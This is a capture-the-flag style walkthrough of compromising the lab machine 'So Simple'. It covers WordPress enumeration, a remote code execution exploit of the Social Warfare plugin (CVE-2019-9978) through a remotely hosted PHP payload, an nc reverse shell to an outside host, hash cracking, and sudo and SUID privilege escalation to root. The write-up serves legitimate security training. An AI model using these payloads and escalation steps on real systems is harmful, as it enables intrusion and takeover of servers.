# Summary
**We scan the network and found 2 ports open which is 80 and 22. The webserver is running Apache. Doing a bit of enumeration, we found that the site is running WordPress  specifically on `/wordpress`, we found 2 credentials which is `max` and `admin`. Attempt to brute force failed or took too long to wait. Doing enumeration of the site with `wpscan` we found out the CMS is also running with the plugin `Social Warfare 3.50` which with some research found it is vulnerable to CVE-2019-9978. The exploit requires no authentication and can perform remote code execution on the box.**
# Enumeration
## NMAP
```txt
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 5b:55:43:ef:af:d0:3d:0e:63:20:7a:f4:ac:41:6a:45 (RSA)
|   256 53:f5:23:1b:e9:aa:8f:41:e2:18:c6:05:50:07:d8:d4 (ECDSA)
|_  256 55:b7:7b:7e:0b:f5:4d:1b:df:c3:5d:a1:d7:68:a9:6b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: So Simple
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

```

## Web
- Apache/2.4.41
### Feroxbuster
```txt
301        9l       28w      318c http://192.168.65.78/wordpress
```
- Found wordpress site.
- Wordpress version 5.4.2
#### WP-login.php
- User enumeration is possible for the login page.
```txt
The password you entered for the username **admin** is incorrect
```
- Using `WPSCAN` to enumerate users, we found users `max` and `admin`
- We can try to brute-force but it will take a long time.

### WPSCAN
- Found some plugins
- `Social Warfare Version: 3.5.0 (100% confidence)`
- Looking it up on `searchsploit`, we found that it is vulnerable to RCE
```txt
WordPress Plugin Social Warfare < 3.5.3 - Remote Code Execution 
```


# Exploit
- Doing some research the CVE number is `CVE-2019-9978`
- I used this Proof of Concept by [WPSCAN](https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618)
- We basically create `payload.txt.
```php
<pre>system('cat /etc/passwd')</pre>
```
- Now we need to host a web server for it to reach.
- Now to make it work, we need to visit `http://192.168.65.78/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.49.65/payload.txt`
- And we should get the contents of `/etc/passwd` 
```txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
max:x:1000:1000:roel:/home/max:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:112:118:MySQL Server,,,:/nonexistent:/bin/false
steven:x:1001:1001:Steven,,,:/home/steven:/bin/bash
```
- We have user `max` and `steven`.
- Now that we know it can execute code, now let's get shell.
```php
<pre>system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.65 9001 >/tmp/f')</pre>
```
- And we visit the URL we get a reverse shell.


# Post-Exploit
## Internal Enumeration
- Found `wp-config.php`which contains the database creds.
```txt
define( 'DB_USER', 'wp_user' );
                                                                                                                      
/** MySQL database password */
define( 'DB_PASSWORD', 'password' );
```
- We can login into the database and found `wp_users` containing hashes for admin and max
`max:$P$BfDfIwyVLEQAVBrDn/ox9qT6uzgwwZ1`
`admin:$P$BqOIi8a7Jtcidgsi9y9WXw9UIfqD4q1`
- We can crack using `john`
`max:opensesame`
- The password isn't reused for shell for max.
`local.txt:144d34af84556df7aec5f83b3101ecca`

## Privilege Escalation
- Found private keys for `max` in `/home/max/.ssh`
- We can login using SSH using the private keys.
- We are now user `max`
```sh
User max may run the following commands on so-simple:
    (steven) NOPASSWD: /usr/sbin/service
```
- We can run `sudo` as user `steven` on `/usr/sbin/service`
- Checking out for an entry in [GTFOBINS](https://gtfobins.github.io/gtfobins/service/#sudo) there is one.
```sh
sudo service ../../bin/sh
```
- Now let's try it on our system
```sh
max@so-simple:~$ sudo -u steven /usr/sbin/service ../../bin/sh
$ whoami
steven
```
- We now moved to user `steven`.
- Checking out his privileges.
```sh
User steven may run the following commands on so-simple:
    (root) NOPASSWD: /opt/tools/server-health.sh
```
- He can run `sudo `as root on a custom script.
- But it doesn't exists? `/opt` is empty.
- And we somehow have permissions to create and make directories in `/opt`
- Knowing this, we can create whatever script we want as long it's named `server-health.sh`
```sh
steven@so-simple:/opt$ mkdir tools
steven@so-simple:/opt$ cd tools/
steven@so-simple:/opt/tools$ ls
steven@so-simple:/opt/tools$ echo "chmod 4777 /bin/bash" > server-health.sh
steven@so-simple:/opt/tools$ chmod +x server-health.sh 
steven@so-simple:/opt/tools$ ./server-health.sh ^C
steven@so-simple:/opt/tools$ sudo /opt/tools/server-health.sh
steven@so-simple:/opt/tools$ ls -la /bin/bash
-rwsrwxrwx 1 root root 1183448 Feb 25  2020 /bin/bash
steven@so-simple:/opt/tools$ /bin/bash -p
bash-5.0# id
uid=1001(steven) gid=1001(steven) euid=0(root) groups=1001(steven)

```
- I'm basically creating a script that sets `/bin/bash` as a SUID binary.
- Now when we run `/bin/bash` with `-p`, our `EUID`which is `Effect User ID` should be set to 0 which is `root`.
`proof.txt:f4aec14753969a02bb9253da0d9964b8`


